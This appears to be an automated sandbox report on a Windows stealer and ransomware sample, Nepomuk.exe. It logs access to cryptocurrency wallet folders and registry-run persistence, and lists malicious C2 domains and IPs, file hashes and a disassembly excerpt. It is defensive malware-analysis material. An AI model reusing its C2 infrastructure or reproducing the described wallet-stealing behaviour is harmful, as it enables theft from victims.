                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeDirectory queried: C:\Users\user\DocumentsJump to behavior

                    Remote Access Functionality

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | 1 Valid Accounts | 12 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 2 OS Credential Dumping | 2 System Time Discovery | Remote Services | 111 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 Data Encrypted for Impact |
| Credentials | Domains | Default Accounts | 12 Native API | 1 Valid Accounts | 1 Valid Accounts | 3 Obfuscated Files or Information | 111 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 31 Data from Local System | 21 Encrypted Channel | Exfiltration Over Bluetooth | 1 System Shutdown/Reboot |
| Email Addresses | DNS Server | Domain Accounts | 12 Command and Scripting Interpreter | 11 Windows Service | 11 Access Token Manipulation | 11 Software Packing | Security Account Manager | 1 System Service Discovery | SMB/Windows Admin Shares | 1 Screen Capture | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | 12 Service Execution | 1 Registry Run Keys / Startup Folder | 11 Windows Service | 1 DLL Side-Loading | NTDS | 12 File and Directory Discovery | Distributed Component Object Model | 111 Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | 1 PowerShell | Network Logon Script | 11 Process Injection | 1 Masquerading | LSA Secrets | 26 System Information Discovery | SSH | 2 Clipboard Data | 114 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 1 Registry Run Keys / Startup Folder | 1 Valid Accounts | Cached Domain Credentials | 661 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 331 Virtualization/Sandbox Evasion | DCSync | 331 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 11 Access Token Manipulation | Proc Filesystem | 2 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 11 Process Injection | /etc/passwd and /etc/shadow | 11 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
| IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | 1 System Owner/User Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |
[Behavior graph: ID 1663719, Sample: Nepomuk.exe, Startdate: 12/04/2025, Architecture: WINDOWS, Score: 100]

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| Nepomuk.exe | 49% | Virustotal | | Browse |
| Nepomuk.exe | 53% | ReversingLabs | Win32.Malware.Heuristic | |
| SAMPLE | 100% | Joe Sandbox ML | | |

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| C:\Users\user\AppData\Local\Temp\NrEXDJiACHo.exe | 25% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe | 25% | ReversingLabs | | |

No Antivirus matches
No Antivirus matches

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| https://changeaie.top/gepslite5 | 100% | Avira URL Cloud | malware | |
| https://changeaie.top/gepsoh | 100% | Avira URL Cloud | malware | |
| https://changeaie.top/gepsO | 100% | Avira URL Cloud | malware | |
| https://changeaie.top/gepsZ | 100% | Avira URL Cloud | malware | |
| https://changeaie.top/gepsCO. | 100% | Avira URL Cloud | malware | |
| https://changeaie.top/gepse0R | 100% | Avira URL Cloud | malware | |
| https://changeaie.top/gepsj | 100% | Avira URL Cloud | malware | |
| https://changeaie.top/geps5 | 100% | Avira URL Cloud | malware | |
| quantyu.bet/AOSkwi | 100% | Avira URL Cloud | malware | |
| https://91.212.166.19:443/ | 0% | Avira URL Cloud | safe | |
| https://46.8.236.61:443/ | 0% | Avira URL Cloud | safe | |
| https://38.244.132.66:443/ | 0% | Avira URL Cloud | safe | |
| https://194.28.226.181:443/ | 0% | Avira URL Cloud | safe | |
| https://changeaie.top/n | 100% | Avira URL Cloud | malware | |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
github.com | 140.82.114.3 | true | false | - | high
raw.githubusercontent.com | 185.199.111.133 | true | false | - | high
changeaie.top | 104.21.42.7 | true | false | - | high
soursopsf.run | unknown | unknown | false | - | high
quantyu.bet | unknown | unknown | true | - | unknown
                                                                                                                                                                high
                                                                                                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Nepomuk.exe, 00000000.00000003.1294044299.0000000003F28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://gemini.google.com/app?q=Nepomuk.exe, 00000000.00000003.1294044299.0000000003F28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.42.7 | changeaie.top | United States | 13335 | CLOUDFLARENETUS | false
46.8.232.106 | unknown | Russian Federation | 28917 | FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | false
194.28.226.181 | unknown | Russian Federation | 34995 | SYSTEM-LTD-ASRU | false
140.82.114.3 | github.com | United States | 36459 | GITHUBUS | false
193.187.172.163 | unknown | Russian Federation | 64439 | ITOS-ASRU | false
147.45.196.157 | unknown | Russian Federation | 2895 | FREE-NET-ASFREEnetEU | false
185.121.233.152 | unknown | Spain | 198432 | IPCORE-ASES | true
91.212.166.19 | unknown | United Kingdom | 35819 | MOBILY-ASEtihadEtisalatCompanyMobilySA | false
185.199.111.133 | raw.githubusercontent.com | Netherlands | 54113 | FASTLYUS | false
46.8.236.61 | unknown | Russian Federation | 28917 | FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | false
38.244.132.66 | unknown | United States | 174 | COGENT-174US | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1663719
Start date and time: 2025-04-12 09:25:16 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 50s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 19
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Nepomuk.exe
Detection: MAL
Classification: mal100.rans.troj.spyw.evad.winEXE@14/10@5/11
EGA Information:
• Successful, ratio: 80%
HCA Information:
• Successful, ratio: 95%
• Number of executed functions: 40
• Number of non-executed functions: 130
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 184.28.213.193, 172.202.163.200
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 4364 because it is empty
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
03:26:25 | API Interceptor | 7x Sleep call for process: Nepomuk.exe modified
03:26:50 | API Interceptor | 8x Sleep call for process: powershell.exe modified
08:26:52 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run App C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe
08:27:00 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run App C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe
                                                                                                                                                                            gebrelas.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                            • 172.67.197.226
                                                                                                                                                                            boitrlkg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                            • 172.67.197.226
                                                                                                                                                                            launcher.exeGet hashmaliciousDarkTortilla, LummaC StealerBrowse
                                                                                                                                                                            • 104.21.42.7
                                                                                                                                                                            random.exeGet hashmaliciousAmadey, LummaC StealerBrowse
                                                                                                                                                                            • 172.64.80.1
                                                                                                                                                                            github.comhttps://jk.ievintwayt.com/mgRXV5X/Get hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                                                                                                                            • 140.82.112.3
                                                                                                                                                                            SetupByLumenTeamV10.16.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                            • 140.82.114.3
                                                                                                                                                                            NatchoPremium.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 140.82.114.4
                                                                                                                                                                            NatchoPremium.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 140.82.113.3
                                                                                                                                                                            NATCHO CHEAT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 140.82.113.4
                                                                                                                                                                            NATCHO CHEAT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 140.82.113.4
                                                                                                                                                                            https://jqih.ugsczwgr.es/d3LuDl4019e/$kwidmann@vulcancorp.comGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                                                                                                                            • 140.82.113.4
                                                                                                                                                                            https://forms.office.com/e/v86Z0QdF5RGet hashmaliciousTycoon2FABrowse
                                                                                                                                                                            • 140.82.112.3
                                                                                                                                                                            random.exeGet hashmaliciousAmadey, LummaC Stealer, VidarBrowse
                                                                                                                                                                            • 140.82.113.4
                                                                                                                                                                            Tokin Stealer.batGet hashmaliciousKDOT TOKEN GRABBERBrowse
                                                                                                                                                                            • 140.82.113.3
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                            No context
                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1264
                                                                                                                                                                            Entropy (8bit):5.382861530677599
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:3FaWSKco4KmM6GjKbm51s4RPQoUebIl+mZ9tXt/NK3R8O9rD:AWSU4YymI4RIoUeU+mZ9tlNWR8GX
                                                                                                                                                                            MD5:8B9BA489BF1F8C966662141E027D49ED
                                                                                                                                                                            SHA1:B28CA450EBA1640EA193DADC2DCBB824D1A02075
                                                                                                                                                                            SHA-256:481B33F8DA302B70E77295E9683459FB311E74CF2FAFC515CDB991F9A00DFED7
                                                                                                                                                                            SHA-512:38D982ED908B774B1F312B5E5687807914BA0BDEF3AD78A7EE87A1811C2CD5426C82A0A005D94474288FCDEFC5BD9589A4489958D7D6BAB1F8D79753248DC8FF
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:low
                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe
                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):9746432
                                                                                                                                                                            Entropy (8bit):7.993954868419722
                                                                                                                                                                            Encrypted:true
                                                                                                                                                                            SSDEEP:196608:newtZn2m0UVg+vQcHRqtTxOGzQJlqIJptgvtks+q97oPJQ6UVZk8D:eoZhl2mhRqtMqQleKq5QJQ6UVZj
                                                                                                                                                                            MD5:8DDC00B505740E2BE081FCF120A6523A
                                                                                                                                                                            SHA1:9114E810BFA5EA52F77BB19FFBA394D4DDEB2EA6
                                                                                                                                                                            SHA-256:854D5AC4352C653DBB566A39DE26F260181A666C01DC8F26347585BCD129A99D
                                                                                                                                                                            SHA-512:6EDFE2C660F8A6ECF5A040F6B3A4FFA9F40408A40100A1B07909A32A2EF59AA9E7F281A82176BAF4E848CFB8D22F8B44BFCD7DC715EFC0F8AF91C75D2CE2380A
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                                            Reputation:low
                                                                                                                                                                            Process:C:\Users\user\Desktop\Nepomuk.exe
                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):9746432
                                                                                                                                                                            Entropy (8bit):7.993954868419722
                                                                                                                                                                            Encrypted:true
                                                                                                                                                                            SSDEEP:196608:newtZn2m0UVg+vQcHRqtTxOGzQJlqIJptgvtks+q97oPJQ6UVZk8D:eoZhl2mhRqtMqQleKq5QJQ6UVZj
                                                                                                                                                                            MD5:8DDC00B505740E2BE081FCF120A6523A
                                                                                                                                                                            SHA1:9114E810BFA5EA52F77BB19FFBA394D4DDEB2EA6
                                                                                                                                                                            SHA-256:854D5AC4352C653DBB566A39DE26F260181A666C01DC8F26347585BCD129A99D
                                                                                                                                                                            SHA-512:6EDFE2C660F8A6ECF5A040F6B3A4FFA9F40408A40100A1B07909A32A2EF59AA9E7F281A82176BAF4E848CFB8D22F8B44BFCD7DC715EFC0F8AF91C75D2CE2380A
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                                            Reputation:low
                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:high, very likely benign file
                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):728
                                                                                                                                                                            Entropy (8bit):6.274107839635763
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:n2hFR/amPO2oNCLS82rcl/81/i60jCmC9WcojfWxzPnNyybBPMG/TknQtadLVUD9:nam2oNCLSb5idjCmqZQf2z1H9lrkQWK9
                                                                                                                                                                            MD5:49D52B0DEED2E78F905C037D6A49015F
                                                                                                                                                                            SHA1:9A14FDCFE4F7C32FC2A62FC3D5C07605DCAAB721
                                                                                                                                                                            SHA-256:6A142D3FEA667D25118FEEC859358603A153894EE2E1F8FC57E4B2384D25A680
                                                                                                                                                                            SHA-512:AC1F87F54EA5A9E5862CA1A51E69199E64484CB6BEEA499F749865F4FB72866377FECFD1F1C5CCE90B89469872B18E23F22950B66AEC18D833BC1CAB1CED0C58
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Entropy (8bit):7.36890316864721
                                                                                                                                                                            TrID:
                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                            File name:Nepomuk.exe
                                                                                                                                                                            File size:573'440 bytes
                                                                                                                                                                            MD5:fac9214c35af0181c30099c68920f445
                                                                                                                                                                            SHA1:5fe0f210c6461db77ed5b7e265b85eae57ffa6f1
                                                                                                                                                                            SHA256:93c71027c0484c7be95f7285b2fe668b60b3bec52b0f57d0deb01fcdfe111a89
                                                                                                                                                                            SHA512:b24a667583c375bdfa7318b74aaa7b124bee84a528c30609eb0e7ca6b1c71426c980f52ea2488dba359e54be97e7144473849dc151dccb6434e60ad7409ec3a6
                                                                                                                                                                            SSDEEP:12288:gVL+IwnXn0S7X/fmB/TyXG3tXIODpvGtW55i5YO8:gVL+IQXjLWkW3dIO0WLi5b
                                                                                                                                                                            TLSH:5CC4F2E1315D820DE1E30678C7AD8B5422305E2B5AF26ACAFB4C7F07967EDC05911ABD
                                                                                                                                                                            File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...M..g.................(..........P.............@..................................j....@..........................T..U....Z..P..
                                                                                                                                                                            Icon Hash:59b9d9f3e8e8b64d
                                                                                                                                                                            Entrypoint:0x401c50
                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                            Time Stamp:0x67F7E04D [Thu Apr 10 15:14:21 2025 UTC]
                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                            OS Version Major:6
                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                            File Version Major:6
                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                            Subsystem Version Major:6
                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                            Import Hash:fd6361ba72b748c3b6b9430ee151fe92
                                                                                                                                                                            Instruction
                                                                                                                                                                            push ebp
                                                                                                                                                                            push ebx
                                                                                                                                                                            push edi
                                                                                                                                                                            push esi
                                                                                                                                                                            sub esp, 18h
                                                                                                                                                                            movzx eax, word ptr [0045FB88h]
                                                                                                                                                                            test al, 3Fh
                                                                                                                                                                            je 00007F5A7486530Ch
                                                                                                                                                                            mov dword ptr [0045FB98h], D57AEF9Fh
                                                                                                                                                                            movsx ecx, word ptr [0045FB7Ah]
                                                                                                                                                                            test ecx, 0443CC0Fh
                                                                                                                                                                            jne 00007F5A7486530Eh
                                                                                                                                                                            mov dword ptr [0045FB64h], B7B3F3FBh
                                                                                                                                                                            jmp 00007F5A7486530Bh
                                                                                                                                                                            cmp dword ptr [0045FB64h], 00000000h
                                                                                                                                                                            je 00007F5A7486531Bh
                                                                                                                                                                            movsx edx, word ptr [0045FB92h]
                                                                                                                                                                            imul edx, edx, 9825125Dh
                                                                                                                                                                            or edx, 53A31489h
                                                                                                                                                                            mov dword ptr [0045FB6Ch], edx
                                                                                                                                                                            imul eax, eax, FFFFB1FBh
                                                                                                                                                                            test eax, 0000C2D2h
                                                                                                                                                                            jne 00007F5A7486531Bh
                                                                                                                                                                            cmp dword ptr [0045FB74h], 00000000h
                                                                                                                                                                            je 00007F5A74865312h
                                                                                                                                                                            mov eax, 000000EFh
                                                                                                                                                                            and eax, dword ptr [0045FB98h]
                                                                                                                                                                            mov dword ptr [0045FB60h], eax
                                                                                                                                                                            movsx edx, word ptr [0045FB9Ch]
                                                                                                                                                                            movzx eax, word ptr [0045FB78h]
                                                                                                                                                                            or edx, eax
                                                                                                                                                                            movzx edx, word ptr [0045FB70h]
                                                                                                                                                                            jne 00007F5A7486532Dh
                                                                                                                                                                            mov esi, 00007B85h
                                                                                                                                                                            sub esi, dword ptr [0045FB84h]
                                                                                                                                                                            imul ecx, dword ptr [0045FB94h]
                                                                                                                                                                            xor esi, edx
                                                                                                                                                                            xor ecx, esi
                                                                                                                                                                            add ecx, 2D4494A4h
                                                                                                                                                                            cmp ecx, 251DFCACh
                                                                                                                                                                            jnbe 00007F5A74865309h
                                                                                                                                                                            mov byte ptr [0045FB72h], 00000000h
                                                                                                                                                                            mov word ptr [0000FB88h], 0000h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x54cc | 0x55 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x5af4 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x62000 | 0x2d989 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x90000 | 0x964 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x6104 | 0x5c0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x2637 | 0x2800 | f800c25edbcf65ca2906c99a7ac5ca13 | False | 0.5333984375 | data | 6.162339743766406 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x4000 | 0x40b9 | 0x4200 | 59bc4a8c078384b38ef1dbae4720a9bb | False | 0.3684303977272727 | data | 4.6701572898672 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x5739e | 0x56c00 | 0cbdb6bd1bdde6d3cf37e616dea02756 | False | 0.9996369551512968 | data | 7.999089175675054 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT | 0x61000 | 0x4 | 0x200 | b0411168e5a96a22bafb6033cbd4808c | False | 0.03125 | data | 0.06116285224115448 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x62000 | 0x2d989 | 0x2da00 | f630103754a4b126aa76329d94a11a1f | False | 0.23912136130136985 | data | 4.927765945521077 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x90000 | 0x964 | 0xa00 | 279f02f310fc7835fff6f4fc87419631 | False | 0.81875 | data | 6.611532481787515 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x625e4 | 0x427f | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9954767079833167
RT_ICON | 0x66864 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | | | 0.10148763752513901
RT_ICON | 0x7708c | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | | | 0.1528799663653563
RT_ICON | 0x80534 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | | | 0.18673752310536043
RT_ICON | 0x859bc | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | | | 0.18132971185640057
RT_ICON | 0x89be4 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | | | 0.2586099585062241
RT_ICON | 0x8c18c | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | | | 0.3219981238273921
RT_ICON | 0x8d234 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | | | 0.45614754098360655
RT_ICON | 0x8dbbc | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | | | 0.5292553191489362
RT_MENU | 0x8e024 | 0xde | data | | | 0.481981981981982
RT_MENU | 0x8e104 | 0x9c | data | | | 0.6923076923076923
RT_MENU | 0x8e1a0 | 0xfc | data | | | 0.503968253968254
RT_MENU | 0x8e29c | 0x226 | data | | | 0.3509090909090909
RT_DIALOG | 0x8e4c4 | 0x14c | data | | | 0.5843373493975904
RT_DIALOG | 0x8e610 | 0x10c | data | | | 0.5895522388059702
RT_DIALOG | 0x8e71c | 0xe8 | data | | | 0.6077586206896551
RT_STRING | 0x8e804 | 0x11e | Matlab v4 mat-file (little endian) I, numeric, rows 0, columns 0 | | | 0.46853146853146854
RT_STRING | 0x8e924 | 0x254 | AmigaOS bitmap font "n", fc_YSize 17664, 18688 elements, 2nd "r", 3rd "r" | | | 0.2986577181208054
RT_STRING | 0x8eb78 | 0x186 | data | | | 0.41794871794871796
RT_ACCELERATOR | 0x8ed00 | 0x50 | data | | | 0.875
RT_ACCELERATOR | 0x8ed50 | 0x58 | data | | | 0.8522727272727273
RT_ACCELERATOR | 0x8eda8 | 0x48 | data | | | 0.9027777777777778
RT_RCDATA | 0x8edf0 | 0x64a | Delphi compiled form 'TfrmSlideShow' | | | 0.4322981366459627
RT_GROUP_ICON | 0x8f43c | 0x84 | data | | | 0.7196969696969697
RT_VERSION | 0x8f4c0 | 0x2bc | data | | | 0.5128571428571429
RT_MANIFEST | 0x8f77c | 0x20d | XML 1.0 document, ASCII text | English | United States | 0.5352380952380953
DLL | Import
